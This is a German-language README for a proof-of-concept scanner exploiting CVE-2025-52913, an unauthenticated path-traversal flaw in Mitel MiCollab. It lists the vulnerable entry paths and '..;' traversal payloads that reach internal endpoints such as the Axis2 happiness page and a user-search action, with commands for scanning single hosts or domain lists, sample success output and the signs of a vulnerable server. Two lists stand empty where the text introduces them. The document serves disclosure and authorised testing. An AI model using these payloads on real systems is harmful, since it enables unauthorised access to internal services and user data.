
Ein Proof of Concept (PoC) für CVE-2025-52913, eine Path-Normalisierungsschwachstelle, die Mitel MiCollab betrifft.
Dieses Repository enthält einen Proof of Concept (PoC) für CVE-2025-52913, eine Pfadnormalisierungsschwachstelle, die Mitel MiCollab betrifft.
Das Problem ermöglicht es nicht authentifizierten Angreifern, beabsichtigte Pfadbeschränkungen durch die Verwendung manipulierter URL-Sequenzen wie ..; zu umgehen, was zu Zugriff auf interne Anwendungsendpunkte führt.
Eine erfolgreiche Ausnutzung kann Folgendes ermöglichen:
Die Schwachstelle kann über die folgenden Pfade ausgelöst werden:
/npm-pwg/loginForm.jsp/
/npm-pwg/extendedUmPlayMessage.jsp/
/npm-admin/showLoginPage.do/
/npm-admin/login.do/
Beispielhafte Traversal-Payloads:
/..;/..;/axis2-AWC/axis2-web/HappyAxis.jsp
/..;/..;/usp/searchUsers.do
pip install -r requirements.txt
python3 POC-CVE-2025-52913.py example.com
python3 POC-CVE-2025-52913.py domains.txt
[*] Testing http://example.com
[+] http://example.com/npm-pwg/loginForm.jsp/..;/..;/axis2-AWC/axis2-web/HappyAxis.jsp - 200
[!] Possible success
Ein Ziel ist wahrscheinlich anfällig, wenn:
Der Server mit HTTP 200 antwortet
Die Antwort enthält:
Axis2Axis2 Happiness PageDie Schwachstelle entsteht durch unsachgemäße Normalisierung manipulierter Pfade, die ..; enthalten, was einen Zugriff über den beabsichtigten Anwendungskontext hinaus ermöglicht.
Dieses Verhalten kann interne Dienste wie folgende offenlegen:
Entdeckt von Dahmani Toumi
Dieses Projekt ist ausschließlich für Bildungszwecke und autorisierte Sicherheitstests bestimmt.
Verwenden Sie dieses Tool nicht gegen Systeme ohne ausdrückliche Genehmigung. Der Autor übernimmt keine Verantwortung für Missbrauch oder Schäden.